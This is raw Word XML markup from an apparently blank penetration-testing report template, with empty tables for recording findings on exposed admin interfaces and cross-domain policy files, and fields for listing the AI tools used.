              <w:t>Methods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02DDCE04" w14:textId="77777777" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00A02B04">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="47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2352D7F" w14:textId="77777777" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00A02B04">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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D1F23E7" w14:textId="77777777" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00A02B04">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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EB11954" w14:textId="77777777" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00A02B04">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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B257F22" w14:textId="77777777" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00A02B04">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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88B3076" w14:textId="77777777" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00A02B0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02B04" w:rsidRPr="00A02B04" w14:paraId="1A5B6874" w14:textId="77777777" w:rsidTr="00805D3C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A5DCD6C" w14:textId="77777777" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00805D3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02B04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6B9E6141" w14:textId="77777777" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00A02B04">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="48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605DD38" w14:textId="77777777" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00A02B04">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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A0488AF" w14:textId="77777777" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00A02B04">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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AFC6529" w14:textId="77777777" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00A02B04">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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FC1A996" w14:textId="77777777" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00A02B04">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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393DB93" w14:textId="77777777" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00A02B0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84682" w:rsidRPr="00A02B04" w14:paraId="56A430BB" w14:textId="77777777" w:rsidTr="00805D3C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="249512A9" w14:textId="26D43623" w:rsidR="00884682" w:rsidRPr="00A02B04" w:rsidRDefault="00884682" w:rsidP="00805D3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A7B6B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 xml:space="preserve">AI Tools Used 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362D94D6" w14:textId="77777777" w:rsidR="00884682" w:rsidRDefault="00884682" w:rsidP="0088468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C030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[*ShellGPT, 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Microsoft Copilot, </w:t>
            </w:r>
            <w:r w:rsidRPr="002C030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Custom Scripts, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DB3B175" w14:textId="77777777" w:rsidR="00884682" w:rsidRDefault="00884682" w:rsidP="0088468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5F9AE66" w14:textId="77777777" w:rsidR="00884682" w:rsidRPr="00A02B04" w:rsidRDefault="00884682" w:rsidP="0088468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84682" w:rsidRPr="00A02B04" w14:paraId="3FEC567B" w14:textId="77777777" w:rsidTr="00805D3C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="021EE695" w14:textId="68BE82A0" w:rsidR="00884682" w:rsidRPr="00BA7B6B" w:rsidRDefault="00884682" w:rsidP="00805D3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B6A7F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Scripts or Prompts Used for Automation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6FA61B13" w14:textId="77777777" w:rsidR="00884682" w:rsidRDefault="00884682" w:rsidP="0088468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26997C5" w14:textId="77777777" w:rsidR="00884682" w:rsidRDefault="00884682" w:rsidP="0088468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680A2A4" w14:textId="77777777" w:rsidR="00884682" w:rsidRPr="002C030C" w:rsidRDefault="00884682" w:rsidP="0088468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884682" w:rsidRPr="00A02B04" w14:paraId="3D8647EA" w14:textId="77777777" w:rsidTr="00805D3C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F1DB9D0" w14:textId="6381C3DB" w:rsidR="00884682" w:rsidRPr="004B6A7F" w:rsidRDefault="00884682" w:rsidP="00805D3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3422B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Extracted Information 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04439F53" w14:textId="77777777" w:rsidR="00884682" w:rsidRDefault="00884682" w:rsidP="0088468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143E2CF" w14:textId="77777777" w:rsidR="00884682" w:rsidRDefault="00884682" w:rsidP="0088468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460E6C2" w14:textId="77777777" w:rsidR="00884682" w:rsidRDefault="00884682" w:rsidP="0088468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48165DC" w14:textId="77777777" w:rsidR="00884682" w:rsidRDefault="00884682" w:rsidP="0088468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26E5380" w14:textId="77777777" w:rsidR="00884682" w:rsidRDefault="00884682" w:rsidP="0088468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</w:tbl>
    <w:p w14:paraId="03BFF40D" w14:textId="77777777" w:rsidR="00884682" w:rsidRPr="00A51A96" w:rsidRDefault="00884682" w:rsidP="00884682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682" w14:paraId="088E52F1" w14:textId="77777777" w:rsidTr="0085194C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76025715" w14:textId="77777777" w:rsidR="00884682" w:rsidRDefault="00884682" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="52D3C1F4" w14:textId="77777777" w:rsidR="00884682" w:rsidRDefault="00884682" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="20C49B43" w14:textId="77777777" w:rsidR="00884682" w:rsidRDefault="00884682" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="31852937" w14:textId="77777777" w:rsidR="00884682" w:rsidRDefault="00884682" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5C8AEE95" w14:textId="77777777" w:rsidR="00884682" w:rsidRDefault="00884682" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="58EFAE88" w14:textId="77777777" w:rsidR="00884682" w:rsidRDefault="00884682" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="00DAB52E" w14:textId="77777777" w:rsidR="00884682" w:rsidRDefault="00884682" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="61655C2F" w14:textId="77777777" w:rsidR="00884682" w:rsidRDefault="00884682" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="01AB5C63" w14:textId="77777777" w:rsidR="00E25320" w:rsidRDefault="00E25320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833876" w:rsidRPr="00A51A96" w14:paraId="32A42E34" w14:textId="77777777" w:rsidTr="004609A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2A73AC42" w14:textId="77777777" w:rsidR="00833876" w:rsidRPr="003C713F" w:rsidRDefault="00833876" w:rsidP="00E53962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3.5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DC15AF">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test for Exposed Admin Interfaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="248DB9CF" w14:textId="77777777" w:rsidR="00833876" w:rsidRPr="00833876" w:rsidRDefault="00833876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3150"/>
        <w:gridCol w:w="3375"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BF3446" w:rsidRPr="00A02B04" w14:paraId="40D9FA4D" w14:textId="77777777" w:rsidTr="00455D6A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3A0252B1" w14:textId="77777777" w:rsidR="00BF3446" w:rsidRPr="00A02B04" w:rsidRDefault="00BF3446" w:rsidP="00455D6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02B04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062B293F" w14:textId="77777777" w:rsidR="00BF3446" w:rsidRPr="00A02B04" w:rsidRDefault="00BF344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F3446" w:rsidRPr="00A02B04" w14:paraId="6E7C19A8" w14:textId="77777777" w:rsidTr="00455D6A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05644075" w14:textId="77777777" w:rsidR="00BF3446" w:rsidRPr="00A02B04" w:rsidRDefault="00BF3446" w:rsidP="00455D6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02B04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72096BDE" w14:textId="77777777" w:rsidR="00BF3446" w:rsidRPr="00A02B04" w:rsidRDefault="00BF344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F3446" w:rsidRPr="00A02B04" w14:paraId="6D08ED0A" w14:textId="77777777" w:rsidTr="00455D6A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29F14588" w14:textId="77777777" w:rsidR="00BF3446" w:rsidRPr="00A02B04" w:rsidRDefault="00BF3446" w:rsidP="00455D6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02B04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280543DB" w14:textId="77777777" w:rsidR="00BF3446" w:rsidRPr="00A02B04" w:rsidRDefault="00BF344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F3446" w:rsidRPr="00A02B04" w14:paraId="413019E9" w14:textId="77777777" w:rsidTr="00455D6A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0A7A9997" w14:textId="64F5D879" w:rsidR="00BF3446" w:rsidRPr="00A02B04" w:rsidRDefault="00B32E78" w:rsidP="00455D6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32E78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Detected Admin Interfaces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25DA4259" w14:textId="46F8C0FA" w:rsidR="00BF3446" w:rsidRPr="00A02B04" w:rsidRDefault="00B32E78" w:rsidP="00B32E7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B32E7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[*List of Exposed URLs if found]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF3446" w:rsidRPr="00A02B04" w14:paraId="3E566EEB" w14:textId="77777777" w:rsidTr="00455D6A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6D5EE7B8" w14:textId="3BBB28B5" w:rsidR="00BF3446" w:rsidRPr="00A02B04" w:rsidRDefault="00665222" w:rsidP="00455D6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665222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Forced Browsing Results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6CEC6325" w14:textId="7C17B3F3" w:rsidR="00BF3446" w:rsidRPr="00665222" w:rsidRDefault="00665222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6522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[*Hidden Directories &amp; Admin Areas Discovered? Yes/No, List if found]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43A47276" w14:textId="77777777" w:rsidR="00BF3446" w:rsidRDefault="00BF3446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6C7E1A0" w14:textId="77777777" w:rsidR="00BF3446" w:rsidRDefault="00BF3446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D2778EA" w14:textId="77777777" w:rsidR="00BF3446" w:rsidRPr="00A02B04" w:rsidRDefault="00BF3446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F3446" w:rsidRPr="00A02B04" w14:paraId="101AA8DC" w14:textId="77777777" w:rsidTr="00455D6A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14E9F2E8" w14:textId="536144A5" w:rsidR="00BF3446" w:rsidRPr="00A02B04" w:rsidRDefault="00665222" w:rsidP="00455D6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665222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>Authentication Required?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315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E187755" w14:textId="77777777" w:rsidR="00BF3446" w:rsidRPr="00A02B04" w:rsidRDefault="00BF3446" w:rsidP="0085194C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="702" w:hanging="396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A02B04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37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BA6FBE7" w14:textId="77777777" w:rsidR="00BF3446" w:rsidRPr="00A02B04" w:rsidRDefault="00BF3446" w:rsidP="0085194C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A02B04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BF3446" w:rsidRPr="00A02B04" w14:paraId="38054EB7" w14:textId="77777777" w:rsidTr="00455D6A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6C504A21" w14:textId="5692B461" w:rsidR="00BF3446" w:rsidRPr="00A02B04" w:rsidRDefault="006153FE" w:rsidP="00455D6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153FE">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Exposed Configuration Files or Sensitive Data?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29CEE88C" w14:textId="77777777" w:rsidR="00BF3446" w:rsidRDefault="00595E29" w:rsidP="006153F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595E2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[*Yes/No, Examples if found]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="266CAA4F" w14:textId="77777777" w:rsidR="00595E29" w:rsidRDefault="00595E29" w:rsidP="006153F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D1C76C6" w14:textId="6897216F" w:rsidR="00595E29" w:rsidRPr="00A02B04" w:rsidRDefault="00595E29" w:rsidP="006153F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F3446" w:rsidRPr="00A02B04" w14:paraId="08BA1E8A" w14:textId="77777777" w:rsidTr="00455D6A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3EA99294" w14:textId="77777777" w:rsidR="00BF3446" w:rsidRPr="00A02B04" w:rsidRDefault="00BF3446" w:rsidP="00455D6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02B04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0A691847" w14:textId="77777777" w:rsidR="00BF3446" w:rsidRPr="00A02B04" w:rsidRDefault="00BF3446" w:rsidP="00595E29">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="49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CD50D78" w14:textId="77777777" w:rsidR="00BF3446" w:rsidRPr="00A02B04" w:rsidRDefault="00BF3446" w:rsidP="00595E29">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="49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4729ED8" w14:textId="77777777" w:rsidR="00BF3446" w:rsidRPr="00A02B04" w:rsidRDefault="00BF3446" w:rsidP="00595E29">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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C448DD4" w14:textId="77777777" w:rsidR="00BF3446" w:rsidRPr="00A02B04" w:rsidRDefault="00BF3446" w:rsidP="00595E29">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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D01AAD3" w14:textId="77777777" w:rsidR="00BF3446" w:rsidRPr="00A02B04" w:rsidRDefault="00BF3446" w:rsidP="00595E29">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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4032BF6" w14:textId="77777777" w:rsidR="00BF3446" w:rsidRPr="00A02B04" w:rsidRDefault="00BF344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F3446" w:rsidRPr="00A02B04" w14:paraId="35668096" w14:textId="77777777" w:rsidTr="00455D6A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67324103" w14:textId="77777777" w:rsidR="00BF3446" w:rsidRPr="00A02B04" w:rsidRDefault="00BF3446" w:rsidP="00455D6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A7B6B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AI Tools Used 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0DF508BA" w14:textId="77777777" w:rsidR="00BF3446" w:rsidRDefault="00BF3446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C030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[*ShellGPT, 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Microsoft Copilot, </w:t>
            </w:r>
            <w:r w:rsidRPr="002C030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Custom Scripts, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C5C8BFC" w14:textId="77777777" w:rsidR="00BF3446" w:rsidRDefault="00BF3446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572EFCD" w14:textId="77777777" w:rsidR="00BF3446" w:rsidRPr="00A02B04" w:rsidRDefault="00BF3446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F3446" w:rsidRPr="00A02B04" w14:paraId="1D55A204" w14:textId="77777777" w:rsidTr="00455D6A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385FD0A9" w14:textId="77777777" w:rsidR="00BF3446" w:rsidRPr="00BA7B6B" w:rsidRDefault="00BF3446" w:rsidP="00455D6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B6A7F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Scripts or Prompts Used for Automation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4ED4B8E3" w14:textId="77777777" w:rsidR="00BF3446" w:rsidRDefault="00BF3446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1C5BFF8" w14:textId="77777777" w:rsidR="00BF3446" w:rsidRDefault="00BF3446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A626F54" w14:textId="77777777" w:rsidR="00BF3446" w:rsidRPr="002C030C" w:rsidRDefault="00BF3446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F3446" w:rsidRPr="00A02B04" w14:paraId="5C0F85DF" w14:textId="77777777" w:rsidTr="00455D6A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79352547" w14:textId="281B4C5F" w:rsidR="00BF3446" w:rsidRPr="004B6A7F" w:rsidRDefault="00E109FF" w:rsidP="00455D6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109FF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Exploit Paths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06E40CFB" w14:textId="4E45EB68" w:rsidR="00BF3446" w:rsidRDefault="00B6394D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B6394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Admin Panel Access, Weak Authentication, Unprotected Directories,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5D2BA25" w14:textId="77777777" w:rsidR="00BF3446" w:rsidRDefault="00BF3446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03C09CA" w14:textId="77777777" w:rsidR="00BF3446" w:rsidRDefault="00BF3446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727C724" w14:textId="77777777" w:rsidR="00BF3446" w:rsidRDefault="00BF3446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6394D" w:rsidRPr="00A02B04" w14:paraId="4465EC06" w14:textId="77777777" w:rsidTr="00455D6A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06C65CF7" w14:textId="3E1BF8FE" w:rsidR="00B6394D" w:rsidRPr="00E109FF" w:rsidRDefault="00A74D3A" w:rsidP="00455D6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A74D3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b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7F7C0BA2" w14:textId="77777777" w:rsidR="00B6394D" w:rsidRDefault="00B6394D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F3A74C4" w14:textId="77777777" w:rsidR="00A74D3A" w:rsidRDefault="00A74D3A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88947F8" w14:textId="77777777" w:rsidR="00A74D3A" w:rsidRDefault="00A74D3A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BF67B8C" w14:textId="77777777" w:rsidR="00A74D3A" w:rsidRDefault="00A74D3A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2E91F64" w14:textId="77777777" w:rsidR="00A74D3A" w:rsidRDefault="00A74D3A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</w:tbl>
    <w:p w14:paraId="4717763C" w14:textId="77777777" w:rsidR="00A74D3A" w:rsidRPr="00A51A96" w:rsidRDefault="00A74D3A" w:rsidP="00A74D3A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74D3A" w14:paraId="247DEADB" w14:textId="77777777" w:rsidTr="0085194C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A1FC66B" w14:textId="77777777" w:rsidR="00A74D3A" w:rsidRDefault="00A74D3A" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="600BE2EB" w14:textId="77777777" w:rsidR="00A74D3A" w:rsidRDefault="00A74D3A" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="175F5C07" w14:textId="77777777" w:rsidR="00A74D3A" w:rsidRDefault="00A74D3A" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="405A37A2" w14:textId="77777777" w:rsidR="00A74D3A" w:rsidRDefault="00A74D3A" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="60151971" w14:textId="77777777" w:rsidR="00A74D3A" w:rsidRDefault="00A74D3A" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D130893" w14:textId="77777777" w:rsidR="00DC15AF" w:rsidRDefault="00DC15AF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374A8C" w:rsidRPr="00A51A96" w14:paraId="2944115F" w14:textId="77777777" w:rsidTr="004609A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="25898F1D" w14:textId="1246F1C0" w:rsidR="00374A8C" w:rsidRPr="003C713F" w:rsidRDefault="00374A8C" w:rsidP="0085194C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3.6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873BEA" w:rsidRPr="00873BEA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test RIA Cross Domain Policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D30C4E6" w14:textId="77777777" w:rsidR="00A74D3A" w:rsidRPr="00BB0F17" w:rsidRDefault="00A74D3A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3150"/>
        <w:gridCol w:w="3375"/>
      </w:tblGrid>
      <w:tr w:rsidR="00494479" w:rsidRPr="00A02B04" w14:paraId="2160503D" w14:textId="77777777" w:rsidTr="00BB0F17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5DE31D64" w14:textId="77777777" w:rsidR="00494479" w:rsidRPr="00A02B04" w:rsidRDefault="00494479" w:rsidP="00BB0F1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02B04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6CEB7E7C" w14:textId="77777777" w:rsidR="00494479" w:rsidRPr="00A02B04" w:rsidRDefault="00494479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94479" w:rsidRPr="00A02B04" w14:paraId="1546F60C" w14:textId="77777777" w:rsidTr="00BB0F17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06F2EAF0" w14:textId="77777777" w:rsidR="00494479" w:rsidRPr="00A02B04" w:rsidRDefault="00494479" w:rsidP="00BB0F1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02B04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302BA433" w14:textId="77777777" w:rsidR="00494479" w:rsidRPr="00A02B04" w:rsidRDefault="00494479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94479" w:rsidRPr="00A02B04" w14:paraId="73B59ACA" w14:textId="77777777" w:rsidTr="00BB0F17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5E59E2B4" w14:textId="77777777" w:rsidR="00494479" w:rsidRPr="00A02B04" w:rsidRDefault="00494479" w:rsidP="00BB0F1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02B04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395B0402" w14:textId="77777777" w:rsidR="00494479" w:rsidRPr="00A02B04" w:rsidRDefault="00494479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94479" w:rsidRPr="00A02B04" w14:paraId="34E558EA" w14:textId="77777777" w:rsidTr="00BB0F17">
        <w:trPr>
          <w:trHeight w:val="1907"/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19001DF6" w14:textId="66DFBA56" w:rsidR="00494479" w:rsidRPr="00A02B04" w:rsidRDefault="00CD7C69" w:rsidP="00BB0F1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D7C6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Retrieved Policy Files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63BBA636" w14:textId="77777777" w:rsidR="00494479" w:rsidRDefault="00494479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B32E7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D7C69" w:rsidRPr="00CD7C6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crossdomain.xml, clientaccesspolicy.xml – Yes/No, List of Locations if found</w:t>
            </w:r>
            <w:r w:rsidRPr="00B32E7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3570FA7" w14:textId="77777777" w:rsidR="00CD7C69" w:rsidRDefault="00CD7C69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E932842" w14:textId="77777777" w:rsidR="00CD7C69" w:rsidRDefault="00CD7C69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48A3378" w14:textId="577B6ACF" w:rsidR="00CD7C69" w:rsidRPr="00A02B04" w:rsidRDefault="00CD7C69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494479" w:rsidRPr="00A02B04" w14:paraId="122EF7D4" w14:textId="77777777" w:rsidTr="00BB0F17">
        <w:trPr>
          <w:trHeight w:val="2078"/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5D90C613" w14:textId="569615EC" w:rsidR="00494479" w:rsidRPr="00A02B04" w:rsidRDefault="004B4D3C" w:rsidP="00BB0F1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4B4D3C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Detected Overly Permissive Policies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160BA22B" w14:textId="2BEF0FBE" w:rsidR="00494479" w:rsidRPr="00665222" w:rsidRDefault="00494479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6522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4B4D3C" w:rsidRPr="004B4D3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Details of Wildcard () Entries, Unrestricted Domains, etc.</w:t>
            </w:r>
            <w:r w:rsidRPr="0066522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759083D" w14:textId="77777777" w:rsidR="00494479" w:rsidRDefault="00494479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D9DE3FB" w14:textId="77777777" w:rsidR="00494479" w:rsidRDefault="00494479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D3FC329" w14:textId="77777777" w:rsidR="00494479" w:rsidRPr="00A02B04" w:rsidRDefault="00494479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94479" w:rsidRPr="00A02B04" w14:paraId="5486DA7B" w14:textId="77777777" w:rsidTr="00BB0F17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2EE64447" w14:textId="56E5BEC4" w:rsidR="00494479" w:rsidRPr="00A02B04" w:rsidRDefault="002F6C7A" w:rsidP="00BB0F1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2F6C7A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Sensitive Data Exposure in Policy Files?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315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2D61D7A" w14:textId="77777777" w:rsidR="00494479" w:rsidRPr="00A02B04" w:rsidRDefault="00494479" w:rsidP="0085194C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="702" w:hanging="396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A02B04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37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B35A84F" w14:textId="77777777" w:rsidR="00494479" w:rsidRPr="00A02B04" w:rsidRDefault="00494479" w:rsidP="0085194C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A02B04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494479" w:rsidRPr="00A02B04" w14:paraId="225A8962" w14:textId="77777777" w:rsidTr="00BB0F17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54787D38" w14:textId="225D3ED4" w:rsidR="00494479" w:rsidRPr="00A02B04" w:rsidRDefault="002F6C7A" w:rsidP="00BB0F1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F6C7A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CSRF or Unauthorized Access Risks Identified?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2D68B3B2" w14:textId="70DB22B9" w:rsidR="00494479" w:rsidRDefault="00494479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595E2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[*Yes/No, </w:t>
            </w:r>
            <w:r w:rsidR="00F171D8" w:rsidRPr="00F171D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Risk Details</w:t>
            </w:r>
            <w:r w:rsidRPr="00595E2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4C29227" w14:textId="77777777" w:rsidR="00494479" w:rsidRDefault="00494479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4382F7A" w14:textId="77777777" w:rsidR="00F171D8" w:rsidRDefault="00F171D8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76D9784" w14:textId="77777777" w:rsidR="00494479" w:rsidRPr="00A02B04" w:rsidRDefault="00494479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171D8" w14:paraId="261855BB" w14:textId="77777777" w:rsidTr="00BB0F17">
        <w:trPr>
          <w:trHeight w:val="2105"/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67C89D67" w14:textId="77777777" w:rsidR="00F171D8" w:rsidRPr="00E109FF" w:rsidRDefault="00F171D8" w:rsidP="00BB0F1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A74D3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b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164B769A" w14:textId="77777777" w:rsidR="00F171D8" w:rsidRDefault="00F171D8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811A0EC" w14:textId="77777777" w:rsidR="00F171D8" w:rsidRDefault="00F171D8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75779AB" w14:textId="77777777" w:rsidR="00F171D8" w:rsidRDefault="00F171D8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1E3593B" w14:textId="77777777" w:rsidR="00F171D8" w:rsidRDefault="00F171D8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9E30A8B" w14:textId="77777777" w:rsidR="00F171D8" w:rsidRDefault="00F171D8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494479" w:rsidRPr="00A02B04" w14:paraId="335809DB" w14:textId="77777777" w:rsidTr="00BB0F17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065533B2" w14:textId="77777777" w:rsidR="00494479" w:rsidRPr="00A02B04" w:rsidRDefault="00494479" w:rsidP="00BB0F1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02B04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0DACE4E5" w14:textId="77777777" w:rsidR="00494479" w:rsidRPr="00A02B04" w:rsidRDefault="00494479" w:rsidP="00B7171B">
            <w:pPr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CD5E5A1" w14:textId="77777777" w:rsidR="00494479" w:rsidRPr="00A02B04" w:rsidRDefault="00494479" w:rsidP="00B7171B">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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4D7336B" w14:textId="77777777" w:rsidR="00494479" w:rsidRPr="00A02B04" w:rsidRDefault="00494479" w:rsidP="00B7171B">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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EDC7937" w14:textId="77777777" w:rsidR="00494479" w:rsidRPr="00A02B04" w:rsidRDefault="00494479" w:rsidP="00B7171B">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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B23422B" w14:textId="77777777" w:rsidR="00494479" w:rsidRPr="00A02B04" w:rsidRDefault="00494479" w:rsidP="00B7171B">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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2AE49F5" w14:textId="77777777" w:rsidR="00494479" w:rsidRPr="00A02B04" w:rsidRDefault="00494479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63E89E0D" w14:textId="77777777" w:rsidR="00A15A75" w:rsidRPr="00A51A96" w:rsidRDefault="00A15A75" w:rsidP="00A15A75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lastRenderedPageBreak/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5A75" w14:paraId="1022CB38" w14:textId="77777777" w:rsidTr="0085194C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E04327C" w14:textId="77777777" w:rsidR="00A15A75" w:rsidRDefault="00A15A75" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3211B01D" w14:textId="77777777" w:rsidR="00A15A75" w:rsidRDefault="00A15A75" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
